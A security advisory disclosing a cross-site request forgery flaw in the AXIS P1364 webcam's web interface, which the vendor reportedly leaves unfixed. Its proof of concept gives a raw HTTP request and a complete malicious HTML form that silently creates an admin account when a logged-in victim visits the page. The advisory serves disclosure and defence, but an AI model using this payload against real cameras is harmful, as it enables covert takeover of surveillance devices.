usd-2023-0007 | AXIS P1364 - Web Cam - Cross-Site Request Forgery (CSRF)

Advisory ID: usd-2023-0007
Product: AXIS P1364 - Web Cam
Affected Version: AXIS OS 9.80.12
Vulnerability Type: Cross-Site Request Forgery (CSRF) (CWE-352)
Security Risk: High
Vendor URL: https://www.axis.com
Vendor acknowledged vulnerability: No, CSRF vulnerabilities are out of scope regarding their vulnerability management policy https://help.axis.com/en-us/axis-vulnerability-management-policy
Vendor Status: Not fixed
CVE number: Not requested yet
CVE Link: Not requested yet

Description

A CSRF vulnerability in the web interface of the AXIS P1364 allows an attacker to create a new admin account.

Proof of Concept

The application fails to protect critical actions against CSRF attacks.
The following request creates a new user in the AXIS camera and does not contain protection mechanisms against CSRF.

POST /axis-cgi/pwdgrp.cgi HTTP/1.1
Host: 192.168.1.254
Content-Length: 97
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: [https://192.168.1.254]()
Connection: close
Authorization: Digest username="root", realm="AX[...]
[...]

action=add&user=testuser&pwd=changeme&grp=users&strict_pwd=1&sgrp=viewer%3Aoperator%3Aadmin%3Aptz

The following HTML creates a malicious website, which creates a new admin account once visited by the victim.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="[https://[REDACTED]/axis-cgi/pwdgrp.cgi"]() method="POST">
      <input type="hidden" name="action" value="add" />
      <input type="hidden" name="user" value="pentestcsrf" />
      <input type="hidden" name="pwd" value="changeme1234!" />
      <input type="hidden" name="grp" value="users" />
      <input type="hidden" name="strict_pwd" value="1" />
      <input type="hidden" name="sgrp" value="viewer:operator:admin&#58>
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Fix

Implement unique CSRF tokens for state-changing requests.

References

Timeline

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.